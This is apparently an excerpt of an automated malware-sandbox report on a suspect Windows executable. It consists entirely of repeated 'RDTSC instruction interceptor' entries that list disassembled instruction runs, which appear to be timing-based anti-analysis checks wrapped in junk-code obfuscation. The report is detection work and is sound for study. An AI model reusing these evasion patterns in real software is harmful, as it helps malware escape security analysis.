Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C836A9 second address: C836BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 push ecx 0x00000008 jl 00007F6F946E7E36h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C82E01 second address: C82E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C82E05 second address: C82E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6F946E7E41h 0x00000011 push esi 0x00000012 jmp 00007F6F946E7E44h 0x00000017 jmp 00007F6F946E7E48h 0x0000001c pop esi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 jp 00007F6F946E7E36h 0x00000027 pop esi 0x00000028 push eax 0x00000029 jmp 00007F6F946E7E43h 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 pop eax 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C82E72 second address: C82E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C83C82 second address: C83C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C83DFA second address: C83E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C84118 second address: C84132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F946E7E41h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C84132 second address: C84158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBAh 0x00000007 jmp 00007F6F951A9EC8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88AAF second address: C88AC4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F946E7E3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edi 0x0000000d je 00007F6F946E7E36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF852E second address: BF8538 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F951A9EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF8538 second address: BF8542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF8542 second address: BF8548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3FBF1 second address: C3FBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3FBF5 second address: C3FBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3FFDB second address: C3FFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40207 second address: C40214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40214 second address: C40218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40218 second address: C4021E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4021E second address: C40239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E47h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40239 second address: C4023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40410 second address: C40414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40414 second address: C4041E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4041E second address: C40423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C404F8 second address: C4055E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F6F951A9EB8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000004h 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122DB716h], ecx 0x00000030 mov al, dl 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F6F951A9EC7h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4055E second address: C40575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E43h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40C29 second address: C40C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F6F951A9EC4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 jl 00007F6F951A9EBCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40C59 second address: C40C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [eax] 0x00000007 push ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40E1F second address: C27AD7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6F951A9EB8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6F951A9EBDh 0x00000012 nop 0x00000013 mov dword ptr [ebp+124753E7h], edi 0x00000019 call dword ptr [ebp+122DB6FBh] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87BA9 second address: C87BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E41h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87BC4 second address: C87BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F951A9EC0h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87BDD second address: C87BE7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6F946E7E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87EE7 second address: C87F02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F6F951A9EBAh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88310 second address: C88322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6F946E7E3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88322 second address: C8832C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8832C second address: C88332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C88332 second address: C88355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jl 00007F6F951A9EB6h 0x00000010 pop edx 0x00000011 jmp 00007F6F951A9EC2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C88355 second address: C8835C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8AE62 second address: C8AE72 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F951A9EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8AE72 second address: C8AE8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BFD6C8 second address: BFD6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BFD6D0 second address: BFD6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8D946 second address: C8D94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8D94A second address: C8D954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8D954 second address: C8D958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8DA87 second address: C8DA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8DA91 second address: C8DA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8DBFF second address: C8DC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8DC03 second address: C8DC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C8DC07 second address: C8DC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6F946E7E40h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C93173 second address: C9317B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9317B second address: C93183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C93183 second address: C93187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C93187 second address: C9318D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9318D second address: C931B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6F951A9EC7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C931B1 second address: C931B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C937A8 second address: C937AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C937AE second address: C937D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E44h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jno 00007F6F946E7E36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9393B second address: C9393F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9393F second address: C93973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Ah 0x00000007 jmp 00007F6F946E7E47h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F6F946E7E3Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C93973 second address: C9397E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F6F951A9EB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4076A second address: C407B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 add cl, FFFFFF84h 0x0000000a mov ebx, dword ptr [ebp+1248578Eh] 0x00000010 movzx edi, dx 0x00000013 add eax, ebx 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F6F946E7E38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f nop 0x00000030 pushad 0x00000031 js 00007F6F946E7E38h 0x00000037 pushad 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C407B2 second address: C407FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F6F951A9EBEh 0x00000011 nop 0x00000012 add edx, dword ptr [ebp+122D18BDh] 0x00000018 push 00000004h 0x0000001a movsx edx, dx 0x0000001d nop 0x0000001e push esi 0x0000001f jmp 00007F6F951A9EC8h 0x00000024 pop esi 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C407FA second address: C407FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C407FE second address: C40804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C99FE5 second address: C9A004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9AB6E second address: C9AB7F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9AB7F second address: C9AB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9AB83 second address: C9ABA9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6F951A9EBFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jne 00007F6F951A9EB6h 0x00000012 jp 00007F6F951A9EB6h 0x00000018 pop edi 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9D81B second address: C9D81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9D81F second address: C9D825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9D825 second address: C9D83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6F946E7E3Fh 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9D83C second address: C9D86F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6F951A9EBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6F951A9EC2h 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F6F951A9EB6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C9D86F second address: C9D873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4644 second address: CA467B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F6F951A9ECDh 0x0000000b jmp 00007F6F951A9EC5h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F6F951A9EB6h 0x0000001c jmp 00007F6F951A9EBBh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4927 second address: CA492B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA492B second address: CA494F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6F951A9EB6h 0x00000014 jmp 00007F6F951A9EC0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4BB0 second address: CA4BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4BB5 second address: CA4BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EBEh 0x00000009 jbe 00007F6F951A9EB6h 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F6F951A9EB6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007F6F951A9EB6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4BE6 second address: CA4BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4BEA second address: CA4C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F6F951A9EBCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4C10 second address: CA4C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA4ED2 second address: CA4EE6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F951A9EB8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnc 00007F6F951A9EB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA51BC second address: CA51D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA51D1 second address: CA51EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007F6F951A9EBEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA577B second address: CA577F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA577F second address: CA579F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007F6F951A9EB6h 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 js 00007F6F951A9EB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA579F second address: CA57A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
